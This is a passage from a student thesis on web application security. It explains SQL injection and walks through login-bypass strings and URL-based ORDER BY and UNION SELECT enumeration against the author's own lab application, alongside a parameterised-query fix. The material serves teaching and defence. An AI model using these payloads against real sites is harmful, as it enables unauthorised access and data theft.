Security Testing on Web Application. Prepared by: Tausif Aghariya S Supervisors: Krishnan Kannoorpatti, Sami Azam. School of Engineering and IT

Academic year: 2021


Security Testing on Web Application

Prepared by:

Tausif Aghariya

S244431

Supervisors: Krishnan Kannoorpatti, Sami Azam

School of Engineering and IT

Faculty of EHSE

Charles Darwin University

Darwin

Acknowledgement

The writing of this thesis has been one of the most important parts of my Software Engineering course. I express sincere thanks to my supervisors Krishnan Kannoorpatti and Sami Azam for their constant support and guidance. I would like to give special thanks to my unit coordinator Mirjam Jonkman, my course coordinator Charles Yeo, technical officer Balaji Iyyaswamy, Ashikali Hasan and librarian Bandana Koirala for all their support and for the precious time they gave to help me finish this thesis.

Abstract

The approach taken to most web applications has been unplanned, so there is a need to raise security standards, since considerable effort is required to keep an application meeting its quality standards. With existing and newer technologies such as ASP, VB Script and CGI, assessing the quality of a website is a hard task because of the many factors that influence its behaviour. With data spread everywhere, and users having little or no knowledge of how to protect it, the dark side of technology has devised its own path and now poses a serious threat to web security through a new set of vulnerabilities, chiefly SQL injection and cross-site scripting (XSS). Older exploits such as buffer overflows still exist, but SQL injection and cross-site scripting vulnerabilities are instances of the broader class of input-validation flaws, which arise from changing security requirements. These input-validation vulnerabilities therefore require fundamentally new techniques to characterise and mitigate them. This dissertation focuses on how efficiently we can deal with these web security vulnerabilities, addressing primarily SQL injection attacks. It then divides the field of web applications to understand the vulnerable domains, and focuses on the approach that could be followed to address the exploits that vulnerabilities make possible, and on the methodologies that can be used to give proper security to a web application.

Keywords: Web application security, web application vulnerabilities, Security testing methodologies

Table of Contents

Acknowledgement
Abstract
List of Figures
List of Abbreviations
I. Introduction
1.1 Motivation
II. Literature review
2.1 Web Application Histories
2.2 Web application and its components
2.2.1 Database layer
2.2.2 Operational layer
2.2.3 User Interface layer
2.3 Security needs for Web Application
2.3.1 Financially motivated attacks
2.3.2 Ideology-driven attacks
2.3.3 Attack discovery and timeline
2.4 Most prevalent vulnerabilities of web application security
III. Methodology and experimental scenario
3.1 SQL Injection Attack
3.2 SQLi Bypass Authentication Attack
3.3 Types of SQL Injection
3.3.1 Simple SQL injection attacks (Ping-Chen, 2011)
3.3.2 SQL injection in MySQL by using the URL method
3.3.3 SQL injection in MySQL by the blind injection method
V. Literature review on web security practices
5.1 History of web application security fields and practice
5.2 Web security design with software engineering
5.2.2 Secure application design and threat modelling
5.2.3 Develop with secure coding
5.2.4 Application security testing
5.3 Standards of Australian web security
5.3.1 Content Security Policy
5.3.2 HTTP Strict Transport Security
5.3.3 Cookie security enhancements
5.3.4 Input validation requirement standards
5.4 Current situation for security testing of web applications
5.4.1 Google introduced two-layer authentication
5.4.2 Introduce SSL (Secure Sockets Layer)
VI. Methodologies for securing web applications
6.1 Agile security testing
6.2 Penetration testing
6.3 Open Web Application Security Project (OWASP)
VII. Approach for preventing SQL injection attacks
7.1 Preventing SQL injection
7.2 Prevention of SQL injection attacks by using filters and techniques
7.2.1 SQL DOM
7.2.2 AMNESIA
7.2.3 Input validation
7.2.4 Session management
7.3 Prevention of injection in MySQL by the URL method attack
7.4 Analysis of web application code
7.4.1 Static code analysis with Polyspace code verifiers
7.4.2 Measuring code complexity and checking against coding standards
7.4.3 Proving the presence of errors
7.4.4 Performing impact analysis
7.6 SQL injection by using the bypass authentication method
7.7 Secure the blind SQL injection
VIII. Conclusion
IX. References
X. Appendices
10.1 Appendix A
10.2 Appendix B
10.3 Appendix C
10.4 Appendix D

List of Figures

Figure 1 Reasons for problem statement
Figure 2 Web Application History (Owasp.org.au, 2015)
Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira & Madeira, 2009)
Figure 4 External Attacker Motives over Web-App Attacks (McClure & Krüger, 2005)
Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011)
Figure 6 Simple SQL Injection Attacks (Ping-Chen, 2011)
Figure 7 Buy Cut Save Application Null Column Analysis
Figure 8 Buy Cut Save Application Fetching Database Version
Figure 9 Buy Cut Save Application Fetching Database Name
Figure 10 Buy Cut Save Application Fetching User Information
Figure 11 Buy Cut Save Application Database, Table and Column Enumeration
Figure 12 Buy Cut Save Application Enumerating Columns
Figure 13 Buy Cut Save Application Dumping Database
Figure 14 Buy Cut Save Application Blind SQL Injection Checking
Figure 15 Buy Cut Save Application Blind SQL Injection Checking
Figure 16 Buy Cut Save Application Getting Version in MySQL Database
Figure 17 Buy Cut Save Application Getting Version in MySQL Database
Figure 18 Buy Cut Save Application Enumerating Name from Database
Figure 19 Buy Cut Save Application Enumerating Name from Database
Figure 20 Buy Cut Save Application Enumerating Name from Database
Figure 21 Buy Cut Save Application Enumerating Column Name
Figure 22 Buy Cut Save Application Enumerating Column Name
Figure 23 History of Web Application Development till Hacking Arrives (Owasp.org.au, 2015)
Figure 24 Security in SDLC Process (SANS Institute, 2007)
Figure 25 HTTP Strict Transport Security
Figure 26 Australian Standard Input Validation Requirements
Figure 27 Steps for Security Testing
Figure 28 Top 10 Reported Vulnerabilities in Web Application
Figure 29 Agile Software Testing Process
Figure 30 Penetration Testing
Figure 31 OWASP Testing Work Flow (Owasp.org.au, 2015)
Figure 33 Defensive Coding
Figure 34 Single Filter for Different Pages
Figure 35 Web Application Filter Architecture
Figure 36 Buy Cut Save Application Login Page
Figure 37 Buy Cut Save Application Login Page
Figure 38 Buy Cut Save Application Category Form Page
Figure 39 Buy Cut Save Application Category Form Page

List of Abbreviations

API Application Programming Interface
BCS Buy Cut Save
CGI Common Gateway Interface
CSS Cascading Style Sheets
DB Database
ERP Enterprise Resource Planning
HSTS HTTP Strict Transport Security
HTML HyperText Markup Language
HTTP HyperText Transfer Protocol
HTTPS HTTP Secure (HTTP over SSL/TLS)
MD5 Message Digest 5
MySQL MySQL relational database management system
OWASP Open Web Application Security Project
SDLC Software Development Life Cycle
SQLI Structured Query Language Injection
SSL Secure Sockets Layer
UI Layer User Interface Layer
UML Unified Modelling Language
URL Uniform Resource Locator
XML Extensible Markup Language

I. Introduction

Gone are the days when the web was all about static pages (HTML was introduced as static: there were no form or input tags, and HTTP did not yet have a POST method), with little or no interaction for the user. It all started in 1993, when the Mosaic browser released extended features such as lists, nested lists, inline pictures and fill-out forms, but attracted a lot of uncertainty because it was not designed properly (Atefeh, Suhami & Antunes, 2012). In the same year the Common Gateway Interface (CGI) was designed, which lets server-side scripts "dynamically generate HTML" from the given input. Soon afterwards Netscape 2.0 shipped JavaScript and showed the world what it could do; it is still helping to take the technology to the next level (Ben, 2003). In 1997 Microsoft changed the face of the World Wide Web by introducing the iframe in Internet Explorer, which led to new advances in browser technology by loading data asynchronously, and Microsoft then shipped the "XMLHTTP" interface with the release of IE5 (Curphey & Arawo, 2006). This technology was slowly picked up by other browsers, which followed with "XMLHttpRequest". In the new millennium, from 2000, web applications entered a new phase with web application frameworks (Web 2.0, which allowed users to do more than just retrieve information), and a new era began. We call it the fundamental step because Web 2.0 created a platform for building highly interactive, user-centric web-aware applications (Ben-Natan, 2005). Without Web 2.0 the Internet would be very different from what it is today: there would be no e-commerce (eBay, Flipkart, Amazon), webmail, Internet messaging, Internet banking, international share trading, forums or web communities (Twitter).

With the advent of Web 2.0, the greater information sharing through networked communities, and the growing adoption of the web in business and in delivery as a service, websites are often attacked directly, as they are the face of the business (Gavin, Eric & Schulte, 2005).

1.1 Motivation

Problem Statement:

Vulnerabilities are still major security issues in web application and cause many exploits

Reason for Problem:

Figure 1 Reasons for problem statement

As Figure 1 shows, there are many reasons why vulnerabilities are still present in web applications. Nowadays developers try to add more and more functionality to a web application. That means they write more code, which creates more coding errors and more opportunities for vulnerable code. Security testing methodologies and processes for web applications only emerged in the early 2000s, so developers are not getting sufficient security testing training. Moreover, they give low priority to risk analysis. These are the reasons, based on my research, why vulnerabilities are still present in web applications.

Proposed Solution:

The preferable solution to this problem is to maintain the security standard of the web application by using suitable security testing methodologies, and to give proper protection against the vulnerabilities in the web application.

Overview of the Report:

This report is divided into four phases. The first phase introduces web applications, their architecture and components, why security is necessary for them, and the most prevalent vulnerabilities of web applications.

The second phase explains the SQL injection attack, the world's second most common attack technique against web applications. It covers how SQL injection works, the types of SQL injection, and a practical implementation against one BCS (Buy Cut Save) web application, in which the whole database of the application is extracted using SQL injection techniques.

From the third phase onwards, the report explains security testing practice, the current situation of security testing approaches, the different methodologies available for applying security testing during web application development, how Australian security standards are set for web applications, and how, by using the security testing process, we can protect the BCS web application that we compromised with SQL injection.

Tested Web Application:

The installation of the vulnerable web application was guided by my supervisors; I set up a lab at CDU with the permission of the IT department, with my own server and domain, and installed the BSC PREDICTION web application as the target for the SQL injection testing. I used that lab for all the testing and thesis-related work. The vulnerable example code illustrates the SQL injection vulnerability: the analysis shows clearly that the id variable is not filtered, so any input passes through it into the application's query.

II. Literature review

2.1 Web Application Histories

Figure 2 shows how web application technologies arrived over time. The present-day web is completely embraced by millions of small, medium and large businesses as an economical medium to communicate and exchange information with prospects, and to transact with clients, partners and anyone else. Looking at the current situation, large web applications are being developed that have become unmanageable, with tangles of jQuery and back-end code that lead to flaws in the application (Fahad & Sarrab, 2011).

Figure 2 Web Application Histories (Owasp.org.au, 2015)

2.2 Web application and its components

A web application can be defined as a highly programmed environment that allows mass customisation through the immediate deployment of a large and diverse range of applications to billions of people across the globe. For the past ten years or more, the web has played a vital role in many business transactions (Cross & Books24x7, 2007). It has undoubtedly been whole-heartedly accepted by millions of people and businesses, and has become an inexpensive channel to communicate and exchange information.

In fact, the web provides a channel through which marketers can sell their products by advertising, analysing the number of people visiting their sites and communicating with them. People nowadays get their work done sitting in front of their computer or mobile, and the reason behind this is the web application (Doupé, Cova & Vigna, 2010). All the data about transactions, or anything else, must be fetched, processed and stored somehow for further use, and this data is retrieved through the web application's enquiry or login forms. Common examples of web applications include webmail, online banking and shopping sites, Google Docs and gaming sites (Antunes, Laranjeiro, Vieira & Madeira, 2009).

A web application generally comprises the following three layers:

- The DATABASE layer (Model): where all the information is stored.

- The OPERATIONAL layer (Controller): where the logic of the application is written.

- The UI layer (View): the interface through which the user interacts.

2.2.1 Database layer:

It is used to store all the information. This layer is an internal interface and is not exposed to the user. Database access calls are not made directly to the storage engine; instead, all database access is routed through the DB layer. The data is structured into objects; these objects are stored as tables, and the attributes of an object are stored as columns in the database.

The database layer is responsible for creating, reading, updating and deleting (CRUD operations) individual records, attributes and values within records. Every database vendor provides its own interface tailored to its product, which leaves it to the application programmer to implement code for each database interface he or she wants to support. Database vendors and products include Oracle, SQL Server, MySQL, DB2 and PostgreSQL.

2.2.2 Operational layer:

This is the layer where the application's business logic is defined. It is responsible for handling user requests and rendering responses within the stipulated time, with the aid of the DB and UI layers. The operational layer can be seen as a manager who ensures that all the resources needed to complete a task are delegated to the proper layers. It waits for requests from clients, authenticates them, delegates data fetching or processing to the model, selects the data to be presented to the client and finally delegates rendering to the UI layer. Technologies used to implement this layer include PHP, Perl and ASP.

2.2.3 User Interface layer:

This is the interface where user interaction happens. Whenever a user raises a request, the controller's actions retrieve data from the underlying database and render it to the HTML page, or other UI, for the user to consume. This layer is not limited to HTML or any text representation of data: it can deliver a wide variety of formats such as pictures, documents, videos and any other format the user asks for. It makes use of technologies such as HTML, CSS, JavaScript (and its frameworks) and many more.

Figure 3 Architecture of web application (Antunes, Laranjeiro, Vieira, & Madeira, 2009)

As Figure 3 shows, web applications can be defined as computer programs that allow users to retrieve data from, or submit data to, a database using their preferred web browser. Web applications have many advantages; one significant advantage is that they run independently of the client platform. They can be deployed quickly anywhere at no cost, and no installation is required at the user's end.

It is also important to understand that web applications generally work over the HTTP protocol, where HTTP functions as a request-response protocol in the client-server model. Because HTTP itself is stateless, the connection is kept in the form of sessions: an HTTP session uses a dedicated HTTP cookie to associate a certain amount of information with the client. This cookie, often termed the session hash or session identifier, is by common practice an opaque random or cryptographically protected value that links the client to its access information held on the server.

2.3 Security needs for Web Application:

There is no doubt that the diverse techniques available to attackers have made defending web applications a herculean task. The SANS Institute rates "Internet-facing Web sites that are vulnerable to attack" as the second highest cyber security risk to enterprises (Bayles & Books24x7, 2007). Web applications are now the means of cost-effective business solutions and have proved to make business easy; for the same reason they are widely used across all sectors, including business, banking, finance, education, healthcare and technology (Bayles & Books24x7, 2007). Threats on the Internet are so poised that nothing on the web can be considered safe. Online services integrated with web applications have grown at a brisk pace with minimal or no attention to security, which leaves many corporate sites vulnerable to attack.

Internet-facing websites and web applications are low-hanging fruit for attackers, because these applications handle so much data, including personally identifiable information and the private data of the organisation and its clients. Many prominent organisations have fallen prey to hackers because they invest heavily in network security and little in web application security, which is rather like "buying good doors when the problem is with the windows" (Fong, Gaucher & Okun, 2008). A security breach puts everything at stake: it damages customer trust, reputation and revenue, and can lead to legal liability. A website's functionality depends entirely on its web applications, which are programmed to capture, process, transmit and store personal and confidential information such as banking details, social security numbers and medical history. The other side of attacks is not to steal the data in the applications' database servers but to turn trusted websites into malicious ones for client-side exploits (Razzaq, Hur, Farooq & Masood, 2012).

WhiteHat Sentinel, a service that assesses the largest e-commerce, healthcare and technology service firms, confirmed in its security statistics report that 83% of websites are prone to at least one severe vulnerability (Fonseca, Vieira & Madeira, 2007).

Web applications will remain the punching bags of the Internet. They are compromised in one of two ways: either by exploiting a weakness in the application or by impersonation with stolen credentials (McClure & Krüger, 2005). Verizon's DBIR records 3,937 incidents, of which 490 were confirmed data disclosures. Two out of every three attacks are driven in some way by the ideology and rules of activist groups, and fewer than one in three are attributed to financially motivated attackers or to espionage.

Figure 4 External Attacker Motives over Web-App Attacks (McClure & Krüger, 2005)

2.3.1 Financially motivated attacks:

As Figure 4 shows, every information asset has some value to an attacker, its "hack value". Financially driven attacks aim at gaining access to money, and for that reason financial and retail organisations are the prime targets, because their data is money (Shelly, 2010). In a financial organisation the attacks are mostly aimed at gaining access to the web application, since that gives logical access to the money. This means that user credentials and single-factor authentication are enough to achieve the attacker's goal. There are many known and reported tactics for stealing credentials, but the usual ones are as follows (McClure & Krüger, 2005):

- Phishing techniques, which trick the user into supplying credentials, or install malware to steal them.

- One of the oldest methods: password guessing using brute-force techniques.

- The rarest, and the one requiring real skill, is targeting the application directly, using SQL injection or other application-level attacks, or attacking the user-management system itself to obtain credentials and bypass authentication.

(Figure 4 plots the share of external attacks by motive, Espionage, Financial and Ideology/Fun, on a 0% to 70% scale.)

The retail industry suffers mostly attacks aimed at payment-card information: 95% of the reported incidents involved stealing payment-card data (Morgan, 2006). This information is often easily accessible simply by exploiting any web application or stealing saved credentials. Social engineering has played, and still plays, an effective role, as this family of attacks works well enough. SQL injection still dominates attacks on web applications, reaching 80% in the retail industry, followed by techniques that install shells through local file inclusion (LFI) and remote file inclusion (RFI) at 7% (Meier & Meier, 2006).

2.3.2 Ideology Driven Attacks:

These attacks represent the identified motives for attacking web applications by attackers based in different geographical locations. The majority of the attacks focus on actually exploiting the targets (Simpson, Backman & Corley, 2012).

The attacks are driven by different reasons, but ideological attackers are much less concerned with getting business data. The attacks to expect are mainly defacement, to send a message, or hijacking the server to attack others, which can even lead to cyber extortion. Web servers were the only assets targeted in most ideologically motivated attacks (Sarasan, 2013).

2.3.3 Attack discovery and timeline:

In financially motivated attacks the discovery is often recorded, and the attack reported, by the customer, since the customer is usually the first to notice fraudulent activity. Graphs showing the "Discovery Timeline with respect to Attacks" are given in (Costa, Castro, Zhou, Zhang & Peinado, 2007).

2.4 Most prevalent vulnerabilities of web application security

"What we need is more secure web applications, not just more security-enabled applications." The most important task in any industry is to identify vulnerabilities before an attacker does and to take appropriate measures to safeguard the application and the reputation of the organisation against attack (Insight Security Research (NISR) publication, 2002). Not only discovering the vulnerabilities but also estimating the associated business risk is equally important. Whatever security assessment methodology an organisation uses in the development life-cycle of an application, we may still find security concerns in the design or architecture, or even in the framework (NISR publication, 2002). At a later stage, security issues may be found by secure code review or by application security testing (penetration testing), or a security weakness may not be identified until after release, when the application is compromised. According to WhiteHat Sentinel, in a survey of 76 organisations across different industries, the relationship between software security controls and software development life-cycle behaviour on one side, and vulnerability outcomes and reported breaches on the other, was too complicated to draw any conclusion (Tajpour, Ibrahim & Sharifi, 2012).

Reports such as the Verizon Data Breach Investigations Report, the OWASP Top 10, WhiteHat Sentinel, the Symantec Threat Report, and essentially any other report in this area, focus on identifying the most severe risks for organisations in different business areas. Any risk is evaluated on the basis of security controls, threat agents and business impact. Business impacts are application- and business-specific, and threat agents are application-specific; both depend on the details of the application within the enterprise (Oehlert, 2005). According to the 2014 web application security reports, almost all of them list the same risks associated with attacks on web applications, and the top 10 attack types are listed by attack type and business impact (Howard, LeBlanc & Viega, 2010). The top 10 web application attacks identified by Howard, LeBlanc and Viega are listed in Appendix A.

III. Methodology and experimental scenario

3.1 SQL Injection Attack

Web applications have become more sophisticated and increasingly complex in their architecture. Their existence has given a new dimension to e-commerce and to the entire enterprise resource planning (ERP) industry, and this is clearly visible today as we all stand as end-users of these applications. With the availability of these enterprise systems, the sensitive data they store, handle and process has become critical to all major industry sectors, not only e-commerce (Bayles & Books24x7, 2007).

SQL injection attacks belong to the family of injection attacks. The term SQL, often pronounced "sequel", stands for Structured Query Language, the language used specifically for querying databases (Antunes & Vieira, 2009). SQL injection is considered the most common application-layer attack: it is multifaceted and dominant. These attacks are possible only when the target application has a back-end database, is improperly coded and has no proper control over input validation. Successful exploitation allows the attacker to read and modify (insert, update, delete) sensitive data, and can provide administrative access to the database, where operations such as shutting down or taking over the database become possible (Cross & Books24x7, 2007). Because SQL is ubiquitous across platforms and databases, the attack is portable. To carry out this family of attacks one needs thorough knowledge of client-server technologies, web applications and databases, and also patience (Portland, 2013).

Appendix D, from Razzaq, Hur, Farooq & Masood (2012), explains the attack vectors and impacts of SQL injection attacks.

SQL injection attacks target websites and web applications that allow data to be submitted to, and retrieved from, databases over the Internet. Databases play a vital role in the functioning of modern websites and web applications, as they store the data the site needs to render its services and to provide appropriate content to authorised customers, stakeholders and employees (Cross & Books24x7, 2007). Data such as end-user credentials, banking information and a company's proprietary information may reside in the database and be accessed by authorised users through custom or off-the-shelf applications.

SQL injection attacks are performed with crafted SQL code that is appended to, or inserted into, the web application's user input parameters; this tricks the interpreter into executing the crafted code as part of the queries sent to the database. Any system that constructs SQL queries from user input may be vulnerable, and SQL, as a language for constructing database queries, offers the attacker many ways to do so (Dharam & Shiva, 2014).

Depending on how the application functions and processes user-supplied data, SQL injection can be used to perform the following types of attack (Doupé, Cova & Vigna, 2010):

- Authentication bypass: the attacker logs on to the application without a valid username and password, and may gain administrator privileges.

- Information disclosure: the attacker obtains sensitive information stored in the database.

- Compromised data integrity: the attacker defaces a website or web page, inserts malicious content into web pages, or alters the contents of the database.

- Compromised data availability: the attacker deletes database information, or deletes log or audit information held in the database.

- Remote code execution: the attacker compromises the host operating system.

Example of a small, basic SQL vulnerability:

Consider a web application hosted by a bookstore to make its services available to customers online.

3.2 SQLi Bypass Authentication Attack

When a customer searches for all books in the store published by some publisher XYZ, the application performs the following query (Shar & Tan, 2013):

SELECT Author, Book_name, Published_year FROM bookstore WHERE publisher = 'XYZ'

Now consider a customer who searches for books published by T'XYZ. The application then performs the query:

SELECT Author, Book_name, Published_year FROM bookstore WHERE publisher = 'T'XYZ'

The database server rejects this with a syntax error, for example (Microsoft SQL Server):

Incorrect syntax near 'XYZ'. Unclosed quotation mark after the character string.

Note: when an application behaves this way, we can say it is open to SQL injection attacks.

This flaw allows an attacker to manipulate the query so that it retrieves information on every book in the bookstore, using the string:

XYZ' or 1=1--

Inserting the crafted string into the query gives an unintended result:

SELECT Author, Book_name, Published_year FROM bookstore WHERE publisher = 'XYZ' or 1=1--'

Since 1 always equals 1, the WHERE clause is true for every row, and the database returns every book in the bookstore table.

Note: "--" (double hyphen) tells the SQL interpreter to ignore the rest of the line as a comment. In MySQL, however, "--" must be followed by a space to be treated as a comment; alternatively "#" can be used.

In certain instances, a very small and simple SQL injection flaw might have an immediate, critical impact. Most applications run a form-based login function: the application uses a database to store the users' authentication information (credentials) and performs a SQL query to verify each login attempt made by a user. Below is a small example of such a query:

SELECT * from users where username = 'JOHN' and passwd = 'NHOJ'

An attacker can inject a crafted request either in the username field or in the password field to alter the query to his own requirements. Assume, for instance, that the attacker knows the administrator username of the application, "admin". Now that he knows the user name, he can log in as admin by supplying any password together with the following username:

admin'--

By inserting admin'-- in the query, the query becomes the following:

Select * from users where username = 'admin'--' AND passwd = 'abcdef'

With the comment symbol placed before the password clause, the password validation is bypassed.

Now suppose the attacker is unaware of the administrator's username. The following observations might help the attacker gain access:

- Normally, in most applications, the first account in the database is the admin user, as this account is used to create the other accounts in the application.

- Further, if the submitted query returns more than one user, many applications will simply process the details of the first user.

An attacker can therefore often log in to the application as the first user in the database by passing the following string as the username:

' OR 1=1--

This causes the application to perform the following query:

SELECT * from users where username = '' OR 1=1--' AND password = 'abcde'

- In most cases, a SQL injection vulnerability can be identified and verified just by passing a single untrusted input into the application.

Below are snapshots of the testing I did in my lab on the BCS web application, which I developed myself and then used for testing.

- The user fills out the login form like this:

Login: ' OR ''='

Password: ' OR ''='

- This gives SQLQuery the following value:

SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''

- Instead of comparing the user-supplied data with that present in the Users table, the query compares '' (nothing) to '' (nothing), which, of course, always returns true.

We can see in the snapshot that the user name was filled in as ' OR ''=' and the password as ' OR ''='. The snapshot below shows that the user reaches the main page by using the authentication-bypass method of SQL injection.
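The login check discussed above, as an added example that is not code from the thesis or from the BCS application: the concatenated query is placed beside a parameterised version of the same check, run in SQLite with a constructed users table so it works offline. The table rows and the password "s3cret" are assumptions; the two payloads are the ones shown above.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the users table of the thesis's
    example; the two rows are sample data, not real BCS accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("JOHN", "NHOJ")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, the pattern shown above
    (SELECT * from users where username = '...' and passwd = '...').
    Returns the matched username, or None when no row matches."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND passwd = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with a parameterised query: the values travel separately
    from the SQL text, so a quote or comment marker in them is only data
    and can never terminate the string or comment out the password test."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND passwd = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(conn, username, password):
    """Run both versions on the same input; returns (vulnerable, safe)."""
    return (login_vulnerable(conn, username, password),
            login_safe(conn, username, password))


if __name__ == "__main__":
    db = make_db()
    # A genuine login, the admin'-- bypass, and the ' OR ''=' tautology.
    for user, pw in [("JOHN", "NHOJ"),
                     ("admin'--", "anything"),
                     ("' OR ''='", "' OR ''=')"[:-1])]:
        print(repr(user), repr(pw), "->", compare(db, user, pw))
```

With the concatenated query both payloads return "admin" without a valid password; the parameterised query returns None for them and still accepts the real credentials.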

There may even be instances where flaws are very subtle, making it hard to distinguish them from other categories of vulnerabilities or from small security weaknesses that do not pose any threat (Cross & Books24x7, 2007).

Note: with applications accessing a back-end database, it is quite important to verify URL parameters, POST functions implemented by the application, HTTP headers and cookies.

Attack characters               Description
' or "                          String delimiters
-- or #                         Single-line comment
/*...*/                         Multi-line comment
?parameter1=xyz&parameter2=123  URL parameters
PRINT                           Useful as a non-transactional command
@variable                       Local variable
@@variable                      Global variable
@@version                       Displays the SQL Server version

In order to successfully exploit any SQL injection vulnerability it is necessary to break out of the quotes, because the data passed by the end user is incorporated into a SQL command and placed inside single quotes (Cross & Books24x7, 2007).

Detect SQL Injection Issues: try passing a single quote as an unexpected input character and observe whether an error, or any other change in the result, reveals where exactly the user-given input is not sanitized.

If an error or strange behaviour is observed, pass a second single quote, i.e. two single quotes together. Databases use a pair of single quotes as an escape sequence: it is interpreted as a literal quote inside the string rather than as the closing string terminator. If the result is now error free, or the strange behaviour disappears, the application is most likely vulnerable to injection attacks (Anley, 2007).

To confirm the existence of an injection flaw, use the SQL string concatenation characters to craft a string that evaluates to the original value. If the application responds to the crafted input with the expected output, the application is said to be vulnerable. Every database uses its own string concatenation syntax.

Detect Input Sanitization:

Use the right square bracket (the ] character) as an input character to verify the instances where the given input is used as a SQL identifier without any sanitization.

Detecting Truncation Issues:

Pass lengthy strings of unexpected data into the application as input to check for any instance of buffer overflows. If the application is vulnerable, these actions may throw SQL errors on the page.

Database type   String concatenation characters
Oracle          '||'
MS-SQL          '+'
MySQL           ' ' (a space between two single quotation marks)

Note:

- One way to confirm whether the application is accessing a database is to use "%" (a wildcard character) in the input.

- Submitting the wildcard character % in a search field will often produce many results, which indicates that a SQL query was executed in the associated database.

3.3 Types of SQL Injection:

Figure 5 Types of SQL Injection Attack (Ping-Chen, 2011)

[Figure 5 tree: SQL Injection -> Simple SQL injection (Union SQL Injection, Error Based SQL Injection) and Blind SQL Injection]

The types of SQL injection are categorised in Figure 5: simple SQL injection and blind SQL injection, where the sub-types of simple SQL injection are union SQL injection and error-based SQL injection. All of these types are explained in more detail in this report.

3.3.1 Simple SQL injection Attacks (Ping-Chen, 2011):

Figure 6 Simple SQL Injection Attacks (Ping-Chen, 2011)

Figure 6 above explains the functions and statements used to perform SQL injection attacks. An attacker can use a union query, system stored procedures, end-of-line comments, tautologies and illegal/logically incorrect queries:

Union Query

- A "UNION SELECT" statement returns the union of the intended dataset with the target dataset.

- Eg: select Name, Phone, Address from Users where id=1 UNION ALL SELECT creditcard

System Stored Procedure

- Attackers exploit the database's stored procedures to perpetrate their attacks.

End of Line Comment

- After injecting crafted code into a specific field, the legitimate code that follows is nullified through the use of end-of-line comments.

- Eg: select * from user where name = 'xyz' and userid IS NULL; --';

Tautology

- Injecting statements that are always true, so that queries always return rows upon evaluation of the WHERE condition.

- Eg: SELECT * FROM users WHERE name = ' ' OR '1'='1';

Illegal/Logically Incorrect Query

- An attacker may gain knowledge, such as injectable parameters, data types and names of tables, by injecting illegal/logically incorrect requests.

3.3.2 SQL Injection in MySQL By using URL method

Generally an attacker tests for a vulnerability by passing a quote as input; if the application returns an error message, the web application may be considered vulnerable to SQL injection (Sutton, Greene & Amini, 2007). Error messages vary depending on the type of database, so different web applications may return different errors. Before launching a SQL injection attack, the hacker first finds a SQL injection vulnerability by determining whether the configuration of the database and the related tables and variables is vulnerable. The steps to determine the SQL Server's vulnerability are as follows (Naresh, Soujanya, Yugandhar & Rao, 2011):

1. Using your web browser, search for a website that uses a login page or other database input or query fields (such as an "I forgot my password" form). Look for web pages that use the POST or GET HTML methods by checking the site's source code.

2. Test the SQL server using a single quote ('). Doing so indicates whether the user input variable is sanitized or interpreted literally by the server. If the server responds with an error message that says use 'a'='a' (or something similar), then it is most likely susceptible to a SQL injection attack (Cross, 2007).

3. Use the SELECT command to retrieve data from the database or the INSERT command to add information to the database.

For this thesis, I used the BCS application, which I developed during my academic project. The name of the application is BCS (Buy Cut Save) PREDICTION. It is an application through which customers place meat orders; based on those orders the butcher can see all the customers' orders and add more meat items to the web application. Using MySQL injection via the URL method, I extracted all the customers' personal information, such as email, contact and company name, together with the whole database, and obtained the butcher's information as well. All of the following tests were done on a local host server with this application.

3.3.2.1 Adding Malicious Characters

In a link of a website you may find an "=" sign. To perform a SQL injection on the website, you type commands after the "=" sign and click "Go" in your web browser, as if you were going to a new website. The simplest way to understand what you need to do is to see an example attack broken down into steps (Palmer, 2007).

Suppose we found a site whose links contain an = sign, meaning it is a database-driven website; now we need to determine whether the link is vulnerable. Let's say that we have a site like this:

http://localhost/bcs/admin/category_form.php?id=1

Now, to test whether the link is vulnerable or not, we add a quote (') to the end of the URL. If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar, the site is vulnerable to SQL injection.

3.3.2.2 Analysing Errors

Every database has a different syntax, so you will receive a different error message from each database. Appendix C includes some error messages of some databases (Mirdula & Manivannan, 2013).

If you do not receive an error like the one above, you must move to the next link to test for the vulnerability. This is a very time-consuming process: first we have to collect each and every link of the web application, and then we have to test each link with the payload. If you have received a penetration testing contract for a large web application, it may not be possible to complete the process within the time limit (Mirdula & Manivannan, 2013).

3.3.2.3 Gathering Information

Once the attacker has identified the vulnerable web link, he starts to enumerate various database-related information. Enumeration comprises operations such as null column analysis, database version enumeration, column enumeration etc. In this topic we will understand how a database can be enumerated if a web application suffers from a SQLI bug (Antunes, Vieira, 2009).

3.3.2.4 Enumerating column length MySQL Database

From the previous step we obtained a SQL-injectable URL, so the site is vulnerable; we now go one step further and enumerate the website to find the number of columns. For that we can use the ORDER BY statement (which tells the database how to order the result). Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1+order+by+1--   (no error)

http://localhost/bcs/admin/category_form.php?id=1+order+by+2--   (no error)

http://localhost/bcs/admin/category_form.php?id=1+order+by+3--   (no error)

http://localhost/bcs/admin/category_form.php?id=1+order+by+4--   (error: a message like "Unknown column '4' in 'order clause'" or similar)

All we need to do is increment the number until we get an error like the one above.

In the above example we received an error at 4, which means the table has 3 columns.

After finding the injection point, we check for the UNION operator; with UNION we can select more data in one SQL statement (Messmer, 2008). So we build the query as below. Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3

The above URL may be called the exploitable URL.

3.3.2.5 Null Column Analysis Manually

First of all we add a comment after the exploitable URL, such as /* or --. Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3/*

NOTE: if /* does not work or we get some error, then try --, for example. Injected Queries in Buy Cut save Application:

http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3--

